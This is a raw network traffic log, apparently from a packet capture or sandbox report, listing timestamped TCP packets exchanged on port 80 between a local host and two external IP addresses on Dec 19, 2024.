                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.900791883 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.900804043 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.900846958 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.900949001 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.901595116 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.901607990 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.901659012 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.903132915 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.903146029 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.903199911 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.903199911 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.903963089 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:45.904014111 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.040229082 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.040333033 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.040412903 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.040563107 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.040684938 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.040770054 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.041363955 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.041441917 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.041584015 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.041774035 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.041835070 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.042679071 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.042818069 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.043119907 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.043165922 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.043736935 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.043778896 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.043821096 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.043838024 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.047013044 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.047027111 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.047079086 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.047079086 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.049127102 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.049140930 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.049189091 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.049189091 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.051299095 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.051328897 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.051361084 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.051376104 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.054281950 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.054297924 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.054352045 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.054352045 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.056425095 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.056440115 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.056484938 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.056551933 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.057204962 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.057218075 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.057230949 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.057271957 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.057303905 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.057897091 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.057918072 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.057931900 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.057976007 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.057976961 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.058770895 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.058794022 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.058805943 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.058840990 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.058881044 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.059392929 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.059416056 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.059438944 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.059453011 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.059461117 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.059461117 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.059499979 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.059499979 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.060164928 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.060194016 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.060206890 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.060231924 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.060231924 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.060280085 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.060945034 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.060960054 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.060972929 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.061005116 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.061005116 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.061027050 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.061824083 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.061839104 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.061851978 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.061887026 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.061887026 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.062042952 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.062520027 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.062535048 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.062546015 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.062561989 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.062581062 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.062623978 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.062623978 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.064131021 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.064145088 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.064204931 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.064204931 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.064950943 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.064965963 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.065007925 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.065007925 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.066582918 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.066596031 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.066642046 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.066642046 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.067300081 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.067334890 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.067362070 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.067362070 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.068089962 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.068217039 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.068834066 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.068973064 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.069580078 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.069593906 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.069636106 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.069636106 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.070432901 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.070724010 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.071188927 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.071264982 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.071284056 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.071342945 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.071887016 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.071937084 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.072731018 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.072743893 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.072784901 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.072846889 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.073544979 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.073673964 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.074152946 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.074230909 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.074985027 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.075000048 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.075046062 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.075046062 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.075809956 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.075824022 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.075881004 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.076575041 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.076586962 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.076639891 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.076687098 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.078370094 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.078383923 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.078504086 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.079046011 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.079060078 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.079102039 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.079116106 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.079715014 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.079858065 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.080430984 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.080462933 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.080558062 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.081115007 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.081346989 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.081808090 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.081868887 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.082590103 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.082633018 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.082669973 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.082669973 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.083364010 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.083472967 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.084129095 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.084145069 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.084208965 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.084209919 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.086028099 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.086046934 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.086091995 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.086103916 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.087387085 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.087430000 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.087436914 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.087481976 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.088347912 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.088361025 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.088408947 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.088408947 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.089945078 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.089958906 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.089997053 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.090035915 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.090789080 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.090882063 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.091532946 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.091593981 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.092173100 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.092187881 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.092228889 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.092228889 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.092890024 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.093290091 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.093542099 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.093594074 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.095206976 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.095226049 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.095248938 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.095263004 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.096901894 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.096995115 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.097661972 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.098035097 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.098309994 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.098324060 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.098367929 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.099064112 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.099131107 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.131369114 CET4976580192.168.2.4185.215.113.206
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.231547117 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.231637001 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.231779099 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.231985092 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.232120037 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.232280970 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.232359886 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.232373953 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.232440948 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.233284950 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.233304024 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.233355999 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.233355999 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.234244108 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.234504938 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.234648943 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.235337019 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.235490084 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.235527992 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.235527992 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.237023115 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.237045050 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.237111092 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.239201069 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.239257097 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.239341021 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.243693113 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.243707895 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.243751049 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.245171070 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.245182991 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.245234013 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.247654915 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.247700930 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.248517990 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.248842001 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.249495983 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.249509096 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.249556065 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.250189066 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.250201941 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.250214100 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.250226974 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.250248909 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.250261068 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.250833988 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.250847101 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.250858068 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.250895977 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.250895977 CET4977280192.168.2.431.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.251720905 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.251734018 CET804977231.41.244.11192.168.2.4
                                                                                                                                                                                                                                                          Dec 19, 2024 14:20:46.251744986 CET804977231.41.244.11192.168.2.4
